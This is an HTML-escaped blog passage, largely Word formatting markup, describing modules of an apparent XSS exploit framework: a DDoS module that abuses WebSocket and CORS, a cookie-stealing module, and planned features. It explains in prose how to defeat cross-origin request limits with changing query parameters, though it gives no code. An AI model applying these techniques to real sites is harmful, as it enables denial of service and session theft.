&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: &amp;quot;Times New Roman&amp;quot;; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;With
HTML 5 comes great power. We harvest the power of HTML 5 to abuse the Cross
Origin Resource Sharing (CORS) and WebSocket to implement a DDoS attack.&lt;span style="mso-spacerun: yes;"&gt;&amp;nbsp; &lt;/span&gt;WebSocket is a technology that allow web
applications to have a bidirectional channel to a URI endpoint. Sockets can
send and receive data to and from a web server and respond to opening or
closing a WebSocket. The XMLHttpRequest is a JavaScript object which is used to
exchange data between a server and a bowser behind the scene&lt;span style="color: #00b050;"&gt;. &lt;/span&gt;This can be used for Cross Origin Resource
Sharing (CORS). We can perform a combined and powerful DDoS attack by abusing
these two technologies. This module abuses WebSocket and creates numerous
socket connections with a target server to slow it down. Along with it by
abusing CORS, the add-on create numerous fake GET requests to slow down the
target server. When we send the first request to the target server and the
response contains the 'Access-Control-Allow-Origin' header with a value that
restricts cross site requests, then at times the browser refuses to send more
requests to the same URL. However this can be easily bypassed by making every
request unique by adding a non-existing query-string parameter with changing
values.&lt;/span&gt;&lt;span style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 14.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 11.0pt; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://oi50.tinypic.com/14r02e.jpg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://oi50.tinypic.com/14r02e.jpg" height="112" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 14.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 11.0pt; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; line-height: 115%;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 14.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 11.0pt; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;span style="mso-spacerun: yes;"&gt;&amp;nbsp;

&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:TrackMoves/&gt;
  &lt;w:TrackFormatting/&gt;
  &lt;w:PunctuationKerning/&gt;
  &lt;w:ValidateAgainstSchemas/&gt;
  &lt;w:SaveIfXMLInvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;
  &lt;w:IgnoreMixedContent&gt;false&lt;/w:IgnoreMixedContent&gt;
  &lt;w:AlwaysShowPlaceholderText&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;
  &lt;w:DoNotPromoteQF/&gt;
  &lt;w:LidThemeOther&gt;EN-US&lt;/w:LidThemeOther&gt;
  &lt;w:LidThemeAsian&gt;X-NONE&lt;/w:LidThemeAsian&gt;
  &lt;w:LidThemeComplexScript&gt;X-NONE&lt;/w:LidThemeComplexScript&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
   &lt;w:DontGrowAutofit/&gt;
   &lt;w:SplitPgBreakAndParaMark/&gt;
   &lt;w:DontVertAlignCellWithSp/&gt;
   &lt;w:DontBreakConstrainedForcedTables/&gt;
   &lt;w:DontVertAlignInTxbx/&gt;
   &lt;w:Word11KerningPairs/&gt;
   &lt;w:CachedColBalance/&gt;
  &lt;/w:Compatibility&gt;
  &lt;m:mathPr&gt;
   &lt;m:mathFont m:val="Cambria Math"/&gt;
   &lt;m:brkBin m:val="before"/&gt;
   &lt;m:brkBinSub m:val="--"/&gt;
   &lt;m:smallFrac m:val="off"/&gt;
   &lt;m:dispDef/&gt;
   &lt;m:lMargin m:val="0"/&gt;
   &lt;m:rMargin m:val="0"/&gt;
   &lt;m:defJc m:val="centerGroup"/&gt;
   &lt;m:wrapIndent m:val="1440"/&gt;
   &lt;m:intLim m:val="subSup"/&gt;
   &lt;m:naryLim m:val="undOvr"/&gt;
  &lt;/m:mathPr&gt;&lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
  LatentStyleCount="267"&gt;
  &lt;w:LsdException Locked="false" Priority="0" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Normal"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 7"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 8"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 9"/&gt;
  &lt;w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/&gt;
  &lt;w:LsdException Locked="false" Priority="10" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Title"/&gt;
  &lt;w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/&gt;
  &lt;w:LsdException Locked="false" Priority="11" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/&gt;
  &lt;w:LsdException Locked="false" Priority="22" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Strong"/&gt;
  &lt;w:LsdException Locked="false" Priority="20" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/&gt;
  &lt;w:LsdException Locked="false" Priority="59" SemiHidden="false"
   UnhideWhenUsed="false" Name="Table Grid"/&gt;
  &lt;w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/&gt;
  &lt;w:LsdException Locked="false" Priority="1" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/&gt;
  &lt;w:LsdException Locked="false" Priority="34" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/&gt;
  &lt;w:LsdException Locked="false" Priority="29" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Quote"/&gt;
  &lt;w:LsdException Locked="false" Priority="30" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="19" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/&gt;
  &lt;w:LsdException Locked="false" Priority="21" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/&gt;
  &lt;w:LsdException Locked="false" Priority="31" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/&gt;
  &lt;w:LsdException Locked="false" Priority="32" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/&gt;
  &lt;w:LsdException Locked="false" Priority="33" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/&gt;
  &lt;w:LsdException Locked="false" Priority="37" Name="Bibliography"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/&gt;
 &lt;/w:LatentStyles&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:"Table Normal";
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-priority:99;
 mso-style-qformat:yes;
 mso-style-parent:"";
 mso-padding-alt:0in 5.4pt 0in 5.4pt;
 mso-para-margin-top:0in;
 mso-para-margin-right:0in;
 mso-para-margin-bottom:8.0pt;
 mso-para-margin-left:0in;
 line-height:107%;
 mso-pagination:widow-orphan;
 font-size:11.0pt;
 font-family:"Calibri","sans-serif";
 mso-ascii-font-family:Calibri;
 mso-ascii-theme-font:minor-latin;
 mso-hansi-font-family:Calibri;
 mso-hansi-theme-font:minor-latin;
 mso-bidi-font-family:"Times New Roman";
 mso-bidi-theme-font:minor-bidi;}
&lt;/style&gt;
&lt;![endif]--&gt;

&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;[VIDEO] &lt;a href="https://www.youtube.com/watch?v=cgLGgVWvi9Y"&gt;https://www.youtube.com/watch?v=cgLGgVWvi9Y&lt;/a&gt; [/VIDEO]&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;

&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;h4 class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;XSS Cookie Thief&lt;/span&gt;&lt;/b&gt;&lt;/b&gt;&lt;/h4&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i47.tinypic.com/fypy8m.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://i47.tinypic.com/fypy8m.png" height="252" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&amp;nbsp;

&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;It’s
the traditional Cookie Stealer but a bit advanced and with real time cookie
viewer. This module allows the pentester to create cookie stealing POC.&lt;/span&gt;&lt;/div&gt;
&lt;h4 class="MsoNormal"&gt;
&lt;b&gt;&lt;span style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 18.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/h4&gt;
&lt;h4 class="MsoNormal"&gt;
&lt;b&gt;&lt;span style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 18.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;Features for the Next Build&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/h4&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;Current
version of XSS Exploit Framework is based on Internet Explorer’s webpage
rendering engine Trident. Since XSS got slightly different behavior in
different Web Browsers, the support for the Gecko (Used by Mozilla Firefox) and
Webkit (used by Chrome, Opera, and Safari) Rendering engines will be added up
in the next build. The support for XSS in POST Parameter and XSS testing by
modifying the headers will be included in the next build. XSS Proxy to tunnel
